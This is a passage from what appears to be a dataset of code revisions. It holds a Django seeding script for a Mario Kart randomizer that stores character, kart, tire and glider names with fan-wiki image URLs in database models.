'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr'\n ,\n 'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png'\n ,\n 'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png'\n ,\n 'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809'\n , 'https://www.123-stickers.com/5731-6069-large/Array.jpg',\n 'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr'\n ,\n 'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png'\n ,\n 'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png'\n ,\n 'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo'\n ,\n 'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png'\n ,\n 'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM'\n ,\n 'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ'\n ,\n 'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910'\n ,\n 'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014'\n ,\n 'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222'\n ,\n 'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png'\n ,\n 'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117'\n , 'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',\n 'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323'\n ,\n 'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405'\n ,\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8'\n , 'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',\n 'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141'\n ,\n 'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525'\n ,\n 'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr'\n ,\n 'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png'\n ,\n 'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129'\n ,\n 'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png'\n ,\n 'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr'\n ,\n 'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112'\n ,\n 'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405'\n ,\n 'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png'\n ,\n 'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png'\n ,\n 'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543'\n ,\n 'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en'\n ,\n 'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png'\n ,\n 'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr'\n ]\ncar_names = ['Standard Kart', 'Pipe Frame', 'Mach 8', 'Steel Driver',\n 'Cat Cruiser', 'Circuit Special', 'Tri-Speeder', 'Badwagon', 'Prancer',\n 'Biddybuggy', 'Landship', 'Sneeker', 'Sports Coupe', 'Gold Standard',\n 'GLA', 'W 25 Silver Arrow', '300 SL Roadster', 'Blue Falcon',\n 'Tanooki Kart', 'B Dasher', 'Streetle', 'P-Wing', 'Koopa Clown',\n 'Standard Bike', 'Comet', 'Sport Bike', 'The Duke', 'Flame Rider',\n 'Varmint', 'Mr. Scooty', 'Jet Bike', 'Yoshi Bike', 'Master Cycle',\n 'Master Cycle Zero', 'City Tripper', 'Standard ATV', 'Wild Wiggler',\n 'Teddy Buggy', 'Bone Rattler', 'Splat Buggy', 'Inkstriker']\ncar_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507'\n ]\ntire_names = ['Standard', 'Monster', 'Roller', 'Slim', 'Slick', 'Metal',\n 'Button', 'Off-Road', 'Sponge', 'Wood', 'Cushion', 'Blue Standard',\n 'Hot Monster', 'Azure Roller', 'Crimson Slim', 'Cyber Slick',\n 'Retro Off-Road', 'Gold Tires', 'GLA Tires', 'Triforce Tires',\n 'Ancient Tyres', 'Leaf Tires']\ntire_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810'\n ]\nglider_names = ['Super Glider', 'Cloud Glider', 'Wario Wing', 'Waddle Wing',\n 'Peach Parasol', 'Parachute', 'Parafoil', 'Flower Glider',\n 'Bowser Kite', 'Plane Glider', 'MKTV Parafoil', 'Gold Glider',\n 'Hylian Kite', 'Paraglider', 'Paper Glider']\nglider_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246'\n ,\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313'\n ]\nx = 0\ny = 0\nfor char in char_names:\n index = x - y + 1\n name = char_names[x]\n if 'Yoshi (' in name or 'Shyguy (' in name or '(G)' in name:\n y += 1\n index = None\n new_char = Character(name=char_names[x], image_url=char_urls[x], index=\n index)\n new_char.save()\n x += 1\nx = 0\nfor tire in tire_names:\n index = x + 1\n new_tire = Tire(name=tire_names[x], image_url=tire_urls[x], index=index)\n new_tire.save()\n x += 1\nx = 0\nfor car in car_names:\n index = x + 1\n new_car = Vehicle(name=car_names[x], image_url=car_urls[x], index=index)\n new_car.save()\n x += 1\nx = 0\nfor glider in glider_names:\n index = x + 1\n new_glider = Glider(name=glider_names[x], image_url=glider_urls[x],\n index=index)\n new_glider.save()\n x += 1\n",
"step-5": "import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','mkrandom.settings')\n\nimport django\ndjango.setup()\nfrom main.models import Character, Vehicle, Tire, Glider\nchar_names = [\n 'Mario',\n 'Luigi',\n 'Peach',\n 'Daisy',\n 'Rosalina',\n 'Mario Tanooki',\n 'Peach cat',\n 'Yoshi',\n 'Yoshi (LBlue)',\n 'Yoshi (Black)',\n 'Yoshi (Rose)',\n 'Yoshi (Yellow)',\n 'Yoshi (White)',\n 'Yoshi (Blue)',\n 'Yoshi (Rose)',\n 'Yoshi (Orange)',\n 'Toad',\n 'Koopa',\n 'Shyguy',\n 'Shyguy (LB)',\n 'Shyguy (Black)',\n 'Shyguy (Rose)',\n 'Shyguy (Yellow)',\n 'Shyguy (White)',\n 'Shyguy (Blue)',\n 'Shyguy (Rose)',\n 'Shyguy (Orange)',\n 'Lakitu',\n 'Toadette',\n 'Boo',\n 'Baby Mario',\n 'Baby Luigi',\n 'Baby Peach',\n 'Baby Daisy',\n 'Baby Rosalina',\n 'Metal Mario',\n 'Golden Mario',\n 'Golden Peach',\n 'Wario',\n 'Waluigi',\n 'Donkey Kong',\n 'Bowser',\n 'Skelerex',\n 'Bowser Jr',\n 'Dry Bowser',\n 'Lemmy',\n 'Larry',\n 'Wendy',\n 'Ludwig',\n 'Iggy',\n 'Roy',\n 'Morton',\n 'Inkling (G)',\n 'Inkling (B)',\n 'Link (SSBU)',\n 'Link (BOTW)',\n 'Villager (B)',\n 'Villager(G)',\n 'Mary',\n]\n\nchar_urls = [\n 'https://static.wikia.nocookie.net/heros/images/9/94/Mario_and_Sonic_Tokyo_2020_Mario_artwork.png/revision/latest?cb=20210410003745&path-prefix=fr',\n 'https://freepngimg.com/thumb/categories/462.png',\n 'https://static.wikia.nocookie.net/smashbros/images/0/06/Peach_SMP.png/revision/latest?cb=20190420130956&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/6/6c/Artwork_Daisy_MP10.png/revision/latest?cb=20171021130941&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/1/17/Harmonie_The_Top_100.png/revision/latest?cb=20171021123917&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/3/33/Mario_tanuki_-_SM3DL.png/revision/latest/scale-to-width-down/250?cb=20190409114830&path-prefix=fr',\n 'https://i.pinimg.com/originals/7d/5d/d8/7d5dd803a6eaad9e7491ed59f184eb39.png',\n 'https://www.seekpng.com/png/full/15-156558_ground-pound-yoshi-super-mario-yoshi-png.png',\n 'https://static.wikia.nocookie.net/hello-yoshi/images/f/fb/ACL_MK8_Light_Blue_Yoshi.png/revision/latest?cb=20180325192809',\n 'https://www.123-stickers.com/5731-6069-large/Array.jpg',\n 'https://static.wikia.nocookie.net/supermariorun/images/3/32/Yoshi_rouge.PNG/revision/latest?cb=20190427132857&path-prefix=fr',\n 'https://static.wikia.nocookie.net/supermariorun/images/9/94/Yoshi_jaune.PNG/revision/latest?cb=20190427132253&path-prefix=fr',\n 'https://static.wikia.nocookie.net/yoshi/images/b/b9/Yoshi_blanc.png/revision/latest?cb=20181128092526&path-prefix=fr',\n 'https://mario.wiki.gallery/images/thumb/9/9a/MKT_Artwork_BlueYoshi.png/129px-MKT_Artwork_BlueYoshi.png',\n 'https://e7.pngegg.com/pngimages/860/699/png-clipart-mario-yoshi-yoshi-s-story-super-mario-world-2-yoshi-s-island-yoshi-s-woolly-world-yoshi-s-new-island-yoshi-nintendo-computer-wallpaper.png',\n 